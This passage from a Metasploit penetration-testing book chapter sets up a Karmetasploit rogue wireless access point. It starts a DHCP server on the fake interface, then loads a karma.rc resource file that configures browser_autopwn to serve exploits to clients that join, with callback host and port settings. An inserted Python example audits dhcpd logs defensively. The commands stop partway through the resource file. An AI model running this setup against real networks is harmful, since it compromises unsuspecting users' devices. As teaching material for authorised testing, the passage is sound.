Chapter 12

Next, we turn on the at0 interface and start the DHCP server:

root@bt:/opt/metasploit3/msf3# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@bt:/opt/metasploit3/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
. . . SNIP . . .
Wrote 0 leases to leases file.
Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on   LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@bt:/opt/metasploit3/msf3# ps aux |grep dhcpd
dhcpd     4015  0.0  0.2   3812  1840 ?        Ss   14:09   0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root      4017  0.0  0.0   2012   564 pts/4    S+   14:09   0:00 grep dhcpd
root@bt:/opt/metasploit3/msf3# tail -f /var/log/messages

Apr  2 14:06:57 bt kernel: device mon0 entered promiscuous mode
Apr  2 14:09:30 bt dhcpd: Internet Systems Consortium DHCP Server V3.1.1
Apr  2 14:09:30 bt kernel: warning: `dhcpd3' uses 32-bit capabilities (legacy support in use)
Apr  2 14:09:30 bt dhcpd: Copyright 2004-2008 Internet Systems Consortium.
Apr  2 14:09:30 bt dhcpd: All rights reserved.
Apr  2 14:09:30 bt dhcpd: For info, please visit http://www.isc.org/sw/dhcp/
Apr  2 14:09:30 bt dhcpd: Wrote 0 leases to leases file.
Apr  2 14:09:30 bt dhcpd: Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Apr  2 14:09:30 bt dhcpd: Sending on   LPF/at0/00:21:29:e2:de:14/10.0.0/24

The at0 interface is turned on using the IP address of 10.0.0.1 shown at  , and the DHCP server is started using the configuration file we created earlier, also using at0 as shown at  . To make sure that the DHCP server is running, we run a quick ps aux at  . Finally, we tail the messages log file at   to see when IP addresses are being handed out.
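The same dhcpd syslog lines can be read from a monitoring standpoint. The following Python is an added example, not code from the book or from Metasploit: it extracts the interface dhcpd is listening on and any leases it hands out, and flags a listener on an interface outside an allow-list. The function name audit_dhcpd, the allow-list, and the two DHCPACK sample lines are assumptions made for the example.

```python
import re

# The first two lines are copied from the output above; the two DHCPACK
# lines are constructed samples in ISC dhcpd's usual log format.
SAMPLE_LOG = """\
Apr  2 14:09:30 bt dhcpd: Wrote 0 leases to leases file.
Apr  2 14:09:30 bt dhcpd: Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Apr  2 14:11:02 bt dhcpd: DHCPACK on 10.0.0.100 to 00:11:22:33:44:55 (laptop) via at0
Apr  2 14:12:40 bt dhcpd: DHCPACK on 10.0.0.101 to 66:77:88:99:aa:bb via at0
"""

# timestamp, host, optional [pid], then the dhcpd message text
SYSLOG = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) (?P<host>\S+) dhcpd(?:\[\d+\])?: (?P<msg>.*)$")
LISTEN = re.compile(
    r"^Listening on LPF/(?P<iface>[^/]+)/(?P<mac>[0-9a-f:]{17})/(?P<net>\S+)$", re.I)
ACK = re.compile(
    r"^DHCPACK on (?P<ip>\S+) to (?P<mac>[0-9a-f:]{17})"
    r"(?: \((?P<name>[^)]*)\))? via (?P<iface>\S+)$", re.I)


def audit_dhcpd(log_text, allowed_ifaces=()):
    """Return (listeners, leases, alerts) for dhcpd activity in a syslog excerpt."""
    listeners, leases, alerts = [], [], []
    for line in log_text.splitlines():
        entry = SYSLOG.match(line)
        if not entry:
            continue  # not a dhcpd line
        ts, host, msg = entry.group("ts", "host", "msg")
        if (lis := LISTEN.match(msg)):
            listeners.append((host, lis["iface"], lis["mac"], lis["net"]))
            if lis["iface"] not in allowed_ifaces:
                alerts.append(f"{ts} {host}: dhcpd serving on unapproved "
                              f"interface {lis['iface']} ({lis['net']})")
        elif (ack := ACK.match(msg)):
            # The client hostname is optional in DHCPACK lines
            leases.append((ts, ack["ip"], ack["mac"], ack["name"] or "", ack["iface"]))
    return listeners, leases, alerts


if __name__ == "__main__":
    listeners, leases, alerts = audit_dhcpd(SAMPLE_LOG, allowed_ifaces=("eth0",))
    for alert in alerts:
        print("ALERT", alert)
    for lease in leases:
        print("LEASE", *lease)
```
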

Now that the entire Karmetasploit configuration is complete, we can load the resource file from within msfconsole using resource karma.rc as shown next. (Note that we can also pass the resource file to msfconsole via the command line by entering msfconsole -r karma.rc.) Let’s see it in action:

msf > resource karma.rc
resource (karma.rc)> db_connect postgres:toor@127.0.0.1/msfbook
resource (karma.rc)> use auxiliary/server/browser_autopwn
resource (karma.rc)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (karma.rc)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (karma.rc)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (karma.rc)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (karma.rc)> set LPORT 45000
LPORT => 45000
resource (karma.rc)> set SRVPORT 55550
SRVPORT => 55550
resource (karma.rc)> set URIPATH /ads